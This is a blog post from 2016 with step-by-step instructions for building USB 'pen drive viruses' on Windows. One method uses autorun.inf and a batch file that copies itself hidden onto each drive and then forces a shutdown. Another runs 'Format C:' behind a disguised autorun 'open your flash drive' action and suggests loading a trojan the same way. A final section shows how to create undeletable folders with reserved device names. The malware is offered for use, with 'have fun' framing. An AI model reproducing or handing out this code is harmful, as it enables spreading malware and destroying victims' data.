Thursday 24 November 2016

Create Your own Pen drive virus

Create Your own Pen drive virus

You can make your own pen drive virus. Take all risks your self. This is a simple virus created in MSDos. This virus save in your pen drive. The system will shutdown when open the pen drive. And after the booting the system shutdown when open each drives of your system. So take all risks your self.


1. Connect your pen drive first. Open Notepad and type following:
    
   [autorun]
   ShellExecute=mak.bat

2. And save it name "Autorun.inf ". You should give the same name i.e "Autorun.inf".

3. Open a another Notepad document and type following:

      @echo off
      xcopy "Autorun.inf"/H c:
      xcopy "Autorun.inf"/H d:
      xcopy "Autorun.inf"/H e:
      xcopy "Autorun.inf"/H f:
      xcopy "mak.bat"/H c:
      xcopy "mak.bat"/H d:
      xcopy "mak.bat"/H e:
      xcopy "mak.bat"/H f:
      shutdown -s -f -t 00
4. Save this file name "mak.bat".

5. Change the properties of the files in "Hidden". Copy the both files(Autorun.inf and mak.bat) in to your pen drive. Reconnect the pen drive. And open the pen drive. You will get the result.



Make your own USB Virus Method - 2:

In this tutorial I am going to teach you how to make a USB stick autorun a virus.
this is educational purpose only! i
Step 1: Format your USB Stick
Step 2: Open Notepad and put in the following...
Code:
@echo off
title Delete C:\
cls
echo Are you sure you want to delete all your files? (y/n)
pause > nul
echo Deleting files......
Format C:
Save this as XXX.bat to the root of your USB Stick.
Step 3: Open Notepad again and put in the following...
Code:
[autorun]
icon=(name of your icon).ico
open=XXX.bat
action=Click here to open your flash drive.
shell\open\command=XXX.bat
^^Save this as autorun.inf *Make sure you take out the () when you put in your icons
name, and you have to save the icon you have on the root of the USB Stick.*
Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an
.exe, so if you have a trojan that is .exe then you can make it load that, make sure that you
include where it is loading the file from.
Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The
USB Stick should format the C: drive therefore deleting all files.
Thank you!
have fun..

Making Undeleteable Folder...
We can actually make folders that cannot be deleted in Windows OS.
It must be made using Command Prompt.
It can only be deleted using Command Prompt.
Steps:
1.Go to cmd.
2.Change to the directory that you want.
3.Assume i change to D:
4.So,in Command Prompt,type D: and [enter].
5.Type in this command "md \lpt1\\" without quotes and press enter.
6.The folder will now in your D:
7.Go and try and delete or rename it,you cannot do anything to it.
There are still many names that you can use to name the folder:
-lpt1 until lpt9
-CON
-AUX
To delete it:
1.Go to Command Prompt again.
2.Navigate to the directory.
3.Type in rd \lpt1\\
Thanks..